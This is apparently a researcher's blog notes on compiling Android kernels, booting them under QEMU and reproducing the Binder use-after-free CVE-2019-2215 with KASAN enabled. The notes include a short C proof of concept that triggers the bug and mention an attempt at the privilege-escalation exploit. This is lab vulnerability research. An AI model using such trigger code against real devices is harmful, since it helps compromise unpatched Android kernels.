We are going to try all the iterations of the android kernel in order to understand the compatibility of emulator.
In that case, we will start working with cloudfuzz‘s android kernel that works on Android10, Pixel2 XL.
repo init --depth=1 -u https://android.googlesource.com/kernel/manifest -b q-goldfish-android-goldfish-4.14-dev
repo sync -c --no-tags --no-clone-bundle -jnproc
On qemu it worked
https://fadeevab.com/build-android-kernel-and-run-on-qemu-minimal-step-by-step/
android13-5.15
Pulling the common android kernel
make defconfig
make kvm_guest.config
wget https://storage.googleapis.com/syzkaller/wheezy.img
qemu-system-x86_64 -m 1G -kernel arch/x86/boot/bzImage -hda wheezy.img -append "root=/dev/sda" -nographic
WORKED
It worked for different branch names too
Without kvm_guest.config it worked.
ASB
On Ubuntu 18.04.6 LTS
Enabled CONFIG_BINDER_IPC and KASAN manually.
Patched the vulnerability manually which is mentioned here.
I commented out the green region on the kernel and commented out a few lines for iovec’s usage for exploitation.
The kernel is ASB-2019-11-05_mainline
Booted up with qemu as i mentioned above
PoC compiled with direct gcc on the VM machine because its x86 kernel is running on the qemu.
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>
#define BINDER_THREAD_EXIT 0x40046208ul
int main()
{
int fd, epfd;
struct epoll_event event = { .events = EPOLLIN };
fd = open("/dev/binder", O_RDONLY);
epfd = epoll_create(1000);
epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
ioctl(fd, BINDER_THREAD_EXIT, NULL);
}
I pulled the PoC by wget and SimpleHTTPServer to the machine.
We got the KASAN report when I run the PoC
I tried to run CVE-2019-2215 LPE on the qemu and i got it this.
Let’s try to make it works.
Side note:
I couldn’t emulate any android kernel with android configs. I can enable the binder manually, but other environments demand different needs that QEMU cannot supply. For this reason, if you are working on a specific device’s kernel or specific config file you have to have the device or customized QEMU which could be the emulator or the cuttlefish. In that case, we have a few public sources:
https://sites.google.com/junsun.net/how-to-run-cuttlefish/home
Bir yanıt yazın